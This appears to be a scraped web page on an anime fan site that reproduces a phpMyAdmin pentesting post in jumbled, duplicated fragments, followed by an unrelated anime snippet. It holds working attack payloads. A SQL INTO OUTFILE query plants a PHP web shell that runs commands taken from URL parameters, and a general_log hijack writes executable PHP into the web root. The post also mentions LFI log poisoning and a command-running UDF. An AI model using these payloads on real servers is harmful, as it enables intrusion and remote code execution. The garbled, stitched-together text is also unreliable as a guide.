More battles on Animekombats!

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"; Boom. You now have a web shell.

For a sysadmin, it’s a tool. For a pentester, it is often the endgame .

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/hack.php'; SELECT '<?php phpinfo(); ?>'; Now, visiting http://target.com/hack.php executes your code. This is loud but extremely effective. You have root MySQL access, but you are a low-privilege OS user. How do we escalate?

This post is for educational purposes and authorized security testing only.

If you have FILE privileges or root access to MySQL, you can force the server to write PHP code into its own error log, then include that log via a Local File Inclusion (LFI).

If you have ever taken a certification like OSCP, eJPT, or bug bounty hunted, you know the feeling: You open your browser, type http://target.com/phpmyadmin , and you are greeted by that iconic blue and yellow logon screen.

The next time you see that blue login screen, remember: it’s not just a database manager. It is often one SQL query away from a root shell. Want more "Hacktricks"? Check out the HackTricks GitHub repo for the ultimate cheat sheets.

Published by: Security Tinkerer Reading time: 6 minutes

We compile a MySQL extension (UDF) that runs OS commands.

MySQL needs write permissions to that OS folder, and SELinux/AppArmor usually hates this. 3. When into outfile Fails: The Log File Hijack Modern setups block outfile . But we have a Plan B: General Query Log .

Animekombats

Phpmyadmin Hacktricks Apr 2026

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"; Boom. You now have a web shell.

For a sysadmin, it’s a tool. For a pentester, it is often the endgame .

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/hack.php'; SELECT '<?php phpinfo(); ?>'; Now, visiting http://target.com/hack.php executes your code. This is loud but extremely effective. You have root MySQL access, but you are a low-privilege OS user. How do we escalate? phpmyadmin hacktricks

This post is for educational purposes and authorized security testing only.

If you have FILE privileges or root access to MySQL, you can force the server to write PHP code into its own error log, then include that log via a Local File Inclusion (LFI). SELECT "&lt;

If you have ever taken a certification like OSCP, eJPT, or bug bounty hunted, you know the feeling: You open your browser, type http://target.com/phpmyadmin , and you are greeted by that iconic blue and yellow logon screen.

The next time you see that blue login screen, remember: it’s not just a database manager. It is often one SQL query away from a root shell. Want more "Hacktricks"? Check out the HackTricks GitHub repo for the ultimate cheat sheets. For a pentester, it is often the endgame

Published by: Security Tinkerer Reading time: 6 minutes

We compile a MySQL extension (UDF) that runs OS commands.

MySQL needs write permissions to that OS folder, and SELinux/AppArmor usually hates this. 3. When into outfile Fails: The Log File Hijack Modern setups block outfile . But we have a Plan B: General Query Log .

phpmyadmin hacktricks

Kankuro vs Chiyo

“Puppets move not just by strings, but by the memories of their creators”

For Watch
For Support
0
Leave a comment! Write what you think about the articlex
()
x